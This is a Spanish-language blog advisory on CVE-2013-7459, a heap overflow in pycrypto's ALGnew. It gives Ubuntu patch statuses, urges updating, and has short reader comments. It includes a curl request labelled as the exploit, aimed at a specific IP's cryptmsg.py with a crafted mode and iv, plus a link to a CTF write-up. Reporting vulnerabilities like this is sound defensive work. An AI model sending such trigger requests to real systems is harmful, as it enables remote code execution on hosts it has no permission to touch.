Amigos empezamos el día con esta vulnerabilidad perteneciente a un desbordamiento de búfer basado en heap en la función ALGnew en block_templace.c en Python Cryptography Toolkit (aka pycrypto).
Esta permite a los atacantes remotos ejecutar código arbitrario en el parámetro iv creado para Cryptmsg.py.
CLAVE CVE
CVE-2013-7459
SISTEMAS VULNERABLES
Ubuntu 12.04 LTS (Precise Pangolin): | needs-triage |
Ubuntu 14.04 LTS (Trusty Tahr): | released (2.6.1-4ubuntu0.1) |
Ubuntu Touch 15.04: | pending (2.6.1-5ubuntu0.1) |
Ubuntu Core 15.04: | pending (2.6.1-5ubuntu0.1) |
Ubuntu 16.04 LTS (Xenial Xerus): | released (2.6.1-6ubuntu0.16.04.1) |
Ubuntu 16.10 (Yakkety Yak): | released (2.6.1-6ubuntu0.16.10.2) |
Ubuntu 17.04 (Zesty Zapus): | not-affected (2.6.1-7) |
Amigos actualizar nuestros sistemas.
EXPLOIT:
curl "http://136.243.194.56:8000/cgi-bin/cryptmsg.py?what=enc&msg
=AAAAAAAAAAAAAAAA&key=AAAAAAAAAAAAAAAA&mode=42&iv
=AAAAAAAAAAAAAAAA"
EL EXPLOIT BIEN EXPLICADO:
https://pony7.fr/ctf:public:32c3:cryptmsg
Saludos
Saludos
Li. Rodolfo H. Baz
www.rodlfohbaz.net
y el exploit? para poder analizar?
ResponderEliminarEste comentario ha sido eliminado por el autor.
EliminarMI ESTIMADO AQUÍ ENContraras el EXPLOIT: https://pony7.fr/ctf:public:32c3:cryptmsg EN SI YA LO PUSE EN EL ARTICULO
Eliminar